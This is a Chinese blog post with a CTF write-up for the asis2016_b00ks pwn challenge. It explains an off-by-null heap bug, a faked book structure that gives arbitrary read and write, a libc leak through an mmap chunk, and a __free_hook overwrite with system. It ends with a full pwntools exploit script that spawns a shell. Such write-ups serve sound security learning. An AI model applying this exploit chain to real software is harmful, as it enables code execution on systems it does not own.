[PWN] BUUCTF asis2016_b00ks Offbynull利用

已于 2023-10-02 13:04:24 修改
阅读量175 收藏 1
点赞数
分类专栏: 技巧 PWN 文章标签: python 系统安全
于 2023-10-02 12:42:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/133484330
版权
PWN 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
技巧
8 篇文章 0 订阅
订阅专栏
4 篇文章 0 订阅
订阅专栏

典型的offbyone利用

本地通过patchelf将环境修改为Ubuntu16 libc-2.23
checksec:
在这里插入图片描述
IDA:
菜单题:
在这里插入图片描述

漏洞函数:

在读取输入到缓冲区时,边界检查有问题,最后结束符"\x00"会被读取到size+1的位置
在这里插入图片描述

利用思路

首先会将author name 读取到 unk_202040 处,长度最大0x20个字节到 unk_202060,但是由于offbynull,会导致 unk_202061 被溢出覆盖为 “\x00” 即0。
在这里插入图片描述在这里插入图片描述
而create创建books时会将指向book的指针存放在unk_202060开始的连续地址处,
因此unk_202060会存放第一本书的ptr,offbynull 漏洞 会修改book_ptr的最低字节为00
在这里插入图片描述在这里插入图片描述
创建第一本书后,author name 的结束符会被 第一本书的ptr覆盖,此时 打印 author name 就会连带打印出第一本书的ptr,达到泄露地址的目的。
因为堆的初始化是按页对齐的,而该程序book的生成规律是:name——>desc——>book
程序每创建一个 book 会分配 0x20 字节的结构来维护它的信息

struct book {
int id;
char *name;
char *description;
int size; }

因此offbynull 漏洞修改book_ptr的最低字节为00 => book_ptr0,相当于减小地址,可以达到接近desc地址的目的
这样一来,如果修改desc的内容可以顺序修改book_ptr0的内容,

可以在book_ptr0处伪造一个book stuct,
1.填充自己想要输出的内容,在调用print打印book_ptr0即可打印想要的内容,可以实现任意地址读
2.填充desc为自己想要修改的地址,搭配edit修改book_ptr0的desc可以实现任意地址写,

基于以上思路可以实现获取libc基址后,覆盖__free_hook或者__malloc_hook为system或one gadget

方法一:mmap

堆有两种拓展方式一种是 brk 会直接拓展原来的堆,另一种是 mmap 会单独映射一块内存。
mmap开辟出的块与libc基址的偏移是固定的,因此只要拿到mmap开辟出的chunk的地址,就能通过一个“固定的偏移”得到libc。
申请book2的name和desc都超大,即可mmap分配内存。

调试过程

author name,此时还未创建book,结束符"\x00"在2060字节处
在这里插入图片描述
创建book后,2060处被覆盖,此时print authorname时可以打印处book1的地址
在这里插入图片描述
此时desc距离book1的ptr被覆盖后的地址0x000055d0d7c3b100相差0xb0

在0x000055d0d7c3b100伪造book struct 后,该book结构为
序号:0x1
name_ptr:存储book2的name的指针
desc_ptr:存储book2的desc的指针
size:0x7fff
在这里插入图片描述
此时修改author name 后可以将book1的地址修改为0x000055d0d7c3b100,即伪造的book ,调用 print 时可以打印处book2的name和desc的地址
在这里插入图片描述

在这里插入图片描述
用此可以计算libc的基址,从而得到 free_hook system onegadget 等地址
在这里插入图片描述
接下来edit修改book1:0x000055d0d7c3b100的desc,即可将其指向free_hook,等价于将book2的desc指针修改为free_hook
在这里插入图片描述
在这里插入图片描述
最后edit修改book2的desc,即可将free_hook指向system
在这里插入图片描述
delete()即可调用free函数,free book2时相当于指向system(“/bin/sh”),获取shell
在这里插入图片描述

EXP

from pwn import *
from LibcSearcher import *
from time import *
context.log_level = 'debug'
# file_path = "./chall/1"
# local = 1
# remote_path = "node4.buuoj.cn:29718"
# elf = ELF("./chall/1")
# libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")
# if local != 1:
#     p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
# else:
#     p = process(file_path)

sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rc      = lambda num            : p.recv(num)
rc_all  = lambda                : p.recv()
rcu     = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success("\033[1;31m%s\033[0m --> 0x%x" % (name,data))
get_addr_64 = lambda: u64(rcu(b"\x7f")[-6:].ljust(8,b"\x00"))

def db():
    gdb.attach(p)
    pause()
def dbs(src):
    gdb.attach(p, src)

def tb(x): #将输入内容转换为python3的比特流格式
    return(bytes(str(x),encoding='utf8'))
# asis2016_b00ks
p = process("./b00ks")
# remote_path = "node4.buuoj.cn:28229"
# p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
elf = ELF("./b00ks")
libc = ELF("./libc-2.23.so")
def create(book_size,name,desc_size,desc):
    rcu("> ")
    sdl(b"1")
    rcu(": ")
    sdl(tb(book_size))
    rcu(": ")
    sdl(name)
    rcu(": ")
    sdl(tb(desc_size))
    rcu(": ")
    sdl(desc)
def delete(id):
    rcu("> ")
    sdl(b"2")
    rcu(": ")
    sdl(tb(id))
def edit(id,desc):
    rcu("> ")
    sdl(b"3")    
    rcu(": ")
    sdl(tb(id))
    rcu(": ")
    sdl(desc)
def print1():
    rcu("> ")
    sdl(b"4")
def change(name):
    rcu("> ")
    sdl(b"5")     
    rcu(": ")
    sdl(tb(name))

rcu("Enter author name: ")
sdl(b"l"*32)
create(32,"a"*32,0x100,"a")#1
create(0x21000,"/bin/sh",0x21000,"/bin/sh")#2
# db()
print1()
rcu("l"*32)
book1_addr = u64(rc(6).ljust(8,b"\x00"))
lg("book1_addr",book1_addr)
book2_name_addr_ptr = book1_addr+0x38
book2_desc_addr_ptr = book1_addr+0x40
payload = b"a"*0xb0 + p64(1) + p64(book2_name_addr_ptr) + p64(book2_desc_addr_ptr) + p64(0x7fff)
edit(1,payload)
# db()
change("l"*32)
print1()
rcu("Name: ")
book2_name_addr = u64(rc(6).ljust(8,b"\x00"))
rcu("Description: ")
book2_desc_addr = u64(rc(6).ljust(8,b"\x00"))
lg("book2_name_addr",book2_name_addr)
lg("book2_desc_addr",book2_desc_addr)
# db()
libc_base = book2_name_addr - 0x5c7010
onegadget = libc_base + 0x45206
bin_sh = next(libc.search(b"/bin/sh")) + libc_base
system_addr = libc.symbols["system"] + libc_base
free_hook = libc_base + libc.symbols["__free_hook"]
lg("onegadget",onegadget)
lg("free_hook",free_hook)
lg("bin_sh",bin_sh)
lg("system_addr",system_addr)
edit(1,p64(free_hook))
# db()
edit(2,p64(system_addr))
# db()
# sleep(5)
delete(2)
it()

第二种 (待完善)

看海就会失去海
关注
专栏目录
asis2016-b00ks
40KO的博客
06-02 739
off-by-one 本题主要是堆上面的off-by-one漏洞利用。off-by-one的成因主要是输入边界考虑不周导致的单字节溢出。一种利用方式是通过修改chunk大小造成结构块之间的重叠,本题就是这种利用方式。 程序分析 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 savedreg...
asis2016_b00ks
z1r0的博客
03-21 562
asis2016_b00ks 查看保护 这个看上去很正常,跟进一下read_input 可以看到一个off-by-null漏洞。 这里的作者的名字和heap_ptr贴在了一起 攻击思路:一个off-by-null,看一下可不可以从author_addr这里入手 因为heap_ptr和author_addr贴在了一起,而read_input有一个off-by-null,可以通过change_author_name来使得heap_ptr低一字节被改在\x00。这里还有一个知识点,一开始输入0x20个数
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1356
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1363
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
buu刷题日记 asis2016_b00ks
qq_51474381的博客
05-18 551
1.漏洞点 一个off by null,但和其他堆题的利用不太一样。 输入name时可覆盖heaplist的最低位为0 2.利用思路 1.泄露heap地址 申请大的heap再free掉,show功能正常,直接泄露。 2.泄露libc && 改__free_hook heaplist的第一个指针最低位可覆盖为0,在对应位置伪造结构体,再结合edit和show功能实现任意读写,改freehook为system。 3.shell 申请时写入‘/bin/sh\x00’再
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1458
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
Asis CTF 2016 b00ks
Morphy_Amo的博客
02-22 3457
例题 Asis CTF 2016 b00ks ` 题目链接 1. 安全策略 [*] '/root/ctf/Other/pwn/heap/b00ks' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 开启了full RELRO,因此无法直接进行GOT表劫持。开启了PIE,也导致不能直接用
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 345
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 987
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
asis2016_b00ks --堆的off-by-null
kissyunlei的博客
02-17 580
非常典型的off-by-null题,思路清晰,结构体指向难找,欢迎师傅们来看
【off by null】asis2016_b00ks
huzai9527的博客
05-13 282
【off by null】asis2016_b00ks 1. ida分析 在设置author name的时候存在off by null,输入32个字符后,会在后面添加\x00,author name 紧接着 booklist,当author name输入32字符后,创建一个book会覆盖\x00,此时print book会泄露book[0]的地址。 2. 思路 设置author name的长度为32(最后的\x00会被后创建的book[0]覆盖) 创建两个book,第二个book足够大(泄
[Asis CTF 2016] b00ks
ethan18的博客
08-01 201
这道题主要是用到了Off-By-One漏洞,还有利用mmap成立的堆与libc基址间距相等的原理。
Asis CTF 2016——b00ks
04-18 377
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
初探off-by-one之Asis CTF 2016 b00ks
Vicl1fe的博客
09-25 1003
题目链接:ctf-wiki 参考链接:传送门 如果不懂,可以加讨论qq群:946220807 欢迎大佬坐阵 Off-by-one 单字节溢出,顾名思义,可溢出并且只溢出一个字节。具体还是看题吧。实践出真理。 代码分析 拿到题后,是一个图书管理系统,代码实现五个功能 功能: 创建一个图书 删除图书 编辑图书 打印图书内容 修改作者的名字。 程序刚开始,会让你输入作者的名字,可以看到这里调用了...
Asis CTF 2016 b00ks理解
weixin_30666753的博客
03-05 300
---恢复内容开始--- 最近在学习堆的off by one,其中遇到这道题,萌新的我弄了大半天才搞懂,网上的很多wp都不是特别详细,都得自己好好调试。 首先,这题目是一个常见的图书馆管理系统,虽然我没见过。 1. Create a book 2. Delete a book 3. Edit a book 4. Print book detail 5. Change ...
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 604
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
2016-Asis-books_writeup
【xiaoxiaorenwu's blog】
04-07 419
wiki上的一道经典例题,写wp的目的一方面是wiki上一些细节讲的有点不太清楚,一方面是自己巩固一下做过的题目,看是否是真的掌握。 首先提供题目二级制文件链接:books 预览: 拿到题目先看基本信息: 可以看到题目是64位文件,所有保护全开,一般这种题目是堆题,且看到full relro则大概率是篡改malloc_hook。 然后运行一下,找到程序运行入口,然后放入ida里看反汇编码: 准...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值